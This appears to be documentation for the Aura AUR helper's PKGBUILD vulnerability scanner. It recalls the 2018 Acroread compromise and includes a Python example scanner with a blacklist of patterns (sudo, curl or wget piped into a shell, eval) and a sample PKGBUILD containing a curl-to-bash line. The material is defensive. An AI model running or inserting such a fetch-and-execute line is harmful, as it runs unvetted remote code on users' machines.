PKGBUILD Security Analysis

In July 2018, the Acroread package was compromised. While the offending commit is no longer available, the mailing list mentions the cause: someone had injected a line into Acroread's PKGBUILD that curls down some custom code from the internet and pipes it into a new bash process. Many people discovered that they had fallen victim to this attack, which came without warning and left no obvious trace.

The top of the AUR page states:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

"Caveat emptor". And it is considered standard practice to always check PKGBUILDs before building a package. That said, people aren't perfect, and can miss details. Should they be punished for that with a system vulnerability? Aura's author doesn't think so.

Since 2018 August (Aura 2.0), Aura has had automatic bash vulnerability detection. After dependency checking, each PKGBUILD is parsed and scanned for malicious bash patterns. If one is detected, you'll see a message like this:

> sudo aura -A myget
aura >>= Determining dependencies...

aura >>= WARNING: The PKGBUILD of myget contains blacklisted bash expressions.

    sudo pacman -S aurvote

aura >>= sudo indicates that someone may be trying to gain root access to your machine.
aura >>= Do you wish to quit the build process? [Y/n]
aura >>= Cancelled further processing to avoid potentially malicious bash code.

A PKGBUILD should never be calling sudo pacman on its own; doing so violates packaging best practices. To be fair, the author of this PKGBUILD is probably not malicious, but the package must be fixed either way.
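To make the idea concrete, here is an added example of the kind of check described above. It is not Aura's code and not its actual rule set: Aura parses the PKGBUILD as real bash, whereas this illustration uses plain regular expressions over lines, with a small constructed blacklist (sudo, a download piped straight into a shell, and eval). The sample PKGBUILD, package name and URL are constructed for the example.

```python
"""Minimal PKGBUILD scanner for blacklisted bash patterns (illustrative only)."""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Constructed blacklist. Each entry is (pattern, reason shown to the user).
# This is an assumption for the example, not Aura's real pattern list.
BLACKLIST = [
    (re.compile(r"(^|[\s;&|(])sudo\b"),
     "sudo indicates that someone may be trying to gain root access to your machine."),
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
     "a download piped straight into a shell executes remote code at build time."),
    (re.compile(r"(^|[\s;&|(])eval\b"),
     "eval hides the command that is actually run; inspect its argument."),
]


@dataclass
class Finding:
    line_no: int
    line: str
    reason: str


def _strip_comment(line: str) -> str:
    """Drop a trailing '# ...' comment.

    Only a '#' at line start or after whitespace counts, so parameter
    expansions such as ${pkgver#v} survive. A '#' inside quotes that is
    preceded by a space still truncates the line; a real bash parser
    (which Aura uses) does not have this limitation.
    """
    return re.sub(r"(^|\s)#.*$", r"\1", line).rstrip()


def scan_pkgbuild(text: str) -> list[Finding]:
    """Return one Finding per line that matches a blacklisted pattern."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        code = _strip_comment(raw).strip()
        if not code:
            continue
        for pattern, reason in BLACKLIST:
            if pattern.search(code):
                findings.append(Finding(line_no, raw.strip(), reason))
                break  # one report per line is enough to stop the build
    return findings


def exit_code(findings: list[Finding]) -> int:
    """Non-zero when anything suspicious was found, like a scanner in a pipeline."""
    return 1 if findings else 0


# Constructed sample PKGBUILD containing two suspicious lines and one
# harmless mention of sudo inside a comment.
SAMPLE_PKGBUILD = """\
# Maintainer: Example <example@example.invalid>
pkgname=myget
pkgver=1.0
pkgrel=1
arch=('any')
source=("$pkgname-$pkgver.tar.gz")

build() {
    cd "$srcdir/$pkgname-$pkgver"
    sudo pacman -S aurvote
    curl -s https://example.invalid/setup.sh | bash
    make
}

package() {
    # sudo is only mentioned in this comment, which is harmless
    make DESTDIR="$pkgdir" install
}
"""


if __name__ == "__main__":
    # Usage: python scan.py < PKGBUILD   (or with no stdin: scan the sample)
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_PKGBUILD
    found = scan_pkgbuild(source)
    for f in found:
        print(f"    {f.line}\n>>= line {f.line_no}: {f.reason}")
    if found:
        print(">>= Potential PKGBUILD vulnerabilities detected.")
    sys.exit(exit_code(found))
```

Run against the embedded sample it reports the sudo line and the curl-to-bash line and exits non-zero; the sudo inside the package() comment is ignored. The regex approach is deliberately simple: it cannot see through variable indirection, string concatenation or base64-decoded payloads, which is one reason to keep reading PKGBUILDs yourself even with automated scanning in place.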

Aside from automatic detection, as of 2020 May (Aura 3.0) Aura also has the -P command which can be used to scan any PKGBUILD you give it.

💡 Note: The presence of automatic PKGBUILD scanning is not an excuse to be lazy! Please continue to check PKGBUILDs yourself!

Scanning a PKGBUILD from Stdin

Wondering about the safety of a particular package on the AUR? We don't have to try to build it - we can scan the PKGBUILD in isolation:

> aura -Ap myget | aura -P

    sudo pacman -S aurvote

aura >>= sudo indicates that someone may be trying to gain root access to your machine.
aura >>= Potential PKGBUILD vulnerabilities detected.

Recall that -Ap pulls a PKGBUILD from the AUR and prints it to the terminal.

Scanning a PKGBUILD File

-P is also intended as a tool for AUR package maintainers, to help them ensure that they aren't unintentionally doing something dangerous or suspicious. Let's check Aura's own PKGBUILD...

> aura -Pf PKGBUILD
>

No error code! Phew...

Scanning a Directory

You can also indicate a directory that you know contains a file named PKGBUILD:

> aura -Pd aura/
>

Safe again.